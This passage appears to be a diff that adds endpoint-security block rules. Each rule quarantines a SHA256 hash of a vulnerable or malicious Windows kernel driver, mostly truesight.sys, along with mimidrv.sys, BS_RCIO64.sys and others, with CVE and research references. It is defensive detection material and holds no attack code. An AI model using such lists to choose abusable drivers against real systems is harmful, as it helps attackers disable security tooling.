+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622245Z",
+ "creation_date": "2026-03-23T11:45:29.622247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f67e60228084151fdcb84e94a48693db864cf606b65faef5a1d829175380dbfa",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c365a593-fabd-5d91-9cc2-af65bf473a2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831398Z",
+ "creation_date": "2026-03-23T11:45:30.831402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa9c83e8ca1ab46f4670b32fb4f43a3dd76bd1d12f650d3122ec51ce6c80dd03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c384338a-fe77-5c16-9300-aa501bfcddb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484273Z",
+ "creation_date": "2026-03-23T11:45:31.484277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caea1a15e28a16bb027e18b3c1e7b809f59d773a1f3be77e2fe97affd375faf2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c389d294-a103-594e-9030-04354aabff1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817995Z",
+ "creation_date": "2026-03-23T11:45:30.817997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abb507455dd1e23e91753f17d6d7a8a5d6572e288f25eb75e4cbdd2e60adae88",
+ "comment": "Vulnerable Kernel Driver (aka sepdrv3_1.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c38c975e-3947-5476-9f8b-f0a7454cc623",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147003Z",
+ "creation_date": "2026-03-23T11:45:32.147006Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e9f3f58005d62b241874e9790d457d0fbffc101062166f70a5c27aceefdde36",
+ "comment": "Vulnerable Kernel Driver (aka TPwSav.sys) [https://www.loldrivers.io/drivers/c0634ed7-840e-4a7e-8b34-33efe50405c2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3969cf0-436e-58a0-8600-b77544e7aba3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822308Z",
+ "creation_date": "2026-03-23T11:45:31.822311Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "181d4651f614e8ae094c77a43785ec9a4627b53d75350ee25ba22bd4d4fba3c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c39fcac6-ea6d-586a-9968-e2f798685115",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151020Z",
+ "creation_date": "2026-03-23T11:45:31.151022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151027Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5beec296982c6f5ca83adfc9c5f9bc5af81a32abef8b8a15d2df7e21058020",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3afbb13-97fe-508d-8996-6028b6d7f653",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828902Z",
+ "creation_date": "2026-03-23T11:45:31.828904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3634f9f7ab91b99004b42da85f26fe2b19ad7692a0a49068869a9ece332a3f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bd6b2e-1d3a-521a-a478-c47e36ea54b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468199Z",
+ "creation_date": "2026-03-23T11:45:30.468202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4d7e16649ce3c7ad9355e8d7418a4c234b3763e262f8ccfbda4bc64a402ed27",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bd97a6-a966-5251-b946-e5fbe8c741dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814012Z",
+ "creation_date": "2026-03-23T11:45:31.814016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ce251a2b592afefdcae1a9a6458eea982cb84c79fbd7a23d60735e8e2f7cc53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3bdb0b3-0b6f-5dae-a2c8-58aae4d53529",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143986Z",
+ "creation_date": "2026-03-23T11:45:31.143988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f118e7bd5e3ae74fcd7fdcb71777e30935196495a09bddf01d8f4cc1c0ee5dd3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3bf4a8d-4187-540d-b69e-34b8d46c7367", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834437Z", + "creation_date": "2026-03-23T11:45:30.834440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e9f231567cd2ce00d26989d543e91cb869e8b8cf6c215b94cb917f93820c3138", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3c24a91-c114-5993-9d6d-02165bdfefe3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, 
+ "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821726Z", + "creation_date": "2026-03-23T11:45:31.821728Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ad43b87715587451f01936741b75678a2b35278a2864d72c83fcf2e48e68f7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3c47005-de1e-5b12-920d-3de043e9d250", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498837Z", + "creation_date": "2026-03-23T11:45:31.498840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a9cca94ebc65c44bcf1a89b9936d2347e18f9f9ce3d40a3c71ae18c49e9b600", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3c92310-8cd2-5a0c-8a03-1a2596d87198", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499923Z", + "creation_date": "2026-03-23T11:45:31.499926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27ad30aeba918e35b292c839c3f844cd8b1d6b2ec4d38c77478a7e3a9bd23a95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3d61bd3-ab38-584b-81c8-68fd93ecab0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.603922Z", + "creation_date": 
"2026-03-23T11:45:29.603925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.603931Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1ad1af005bd78e1ea1d1eef5041c2bdb46f60a9baa60f4b7be21f9603f99df0", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3e09ec0-ac09-51b7-a364-0ec916a482fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155066Z", + "creation_date": "2026-03-23T11:45:31.155068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ead5ac6e9b61c92473a152c843a43a028b26485b6287244045fe5c78d34bb832", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3e810ca-87a4-5f94-ac0d-6ae126ccfbb3", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820390Z", + "creation_date": "2026-03-23T11:45:30.820392Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820398Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c0a36990f7eef89b2d5f454b6452b6df1304609903f31f475502e4050241dd8", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3e81b63-118e-5135-b111-c99a68336455", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826667Z", + "creation_date": "2026-03-23T11:45:31.826669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826674Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4da389eed69a4292233f7ea4929fb1caef53326e36dfb9bb97f4aecac6b2ed6a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c3fe41d5-1c84-5f31-8360-83caf045fda0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826402Z", + "creation_date": "2026-03-23T11:45:31.826404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826409Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e1c198d16341274b2a4106a7e798856889f1402a41503a763e00cebfcf1c05a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c40ebfd8-61a3-5496-9914-c1e1a99f63d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477162Z", + "creation_date": "2026-03-23T11:45:31.477165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "402ebccaad7f4e5c2df2063d2ba33beb15f09c7654bb092e5a2bb93b0660d792", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c417fc94-d1f1-5e75-9de9-2f254abf01b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144277Z", + "creation_date": "2026-03-23T11:45:32.144280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"4a61add64bbb08af8576aac592fdafe7114b940878babb3ae90bfde26f315187", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c41f1112-97b7-5b6c-bfdf-154fd3069c8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822033Z", + "creation_date": "2026-03-23T11:45:31.822036Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822044Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea3b808d4eb63d842cfd750ab5d7f7cca460b4fc63b43071af6384a4f1a40516", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c44901e4-5be5-53ad-8bcf-3e62df6c08d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
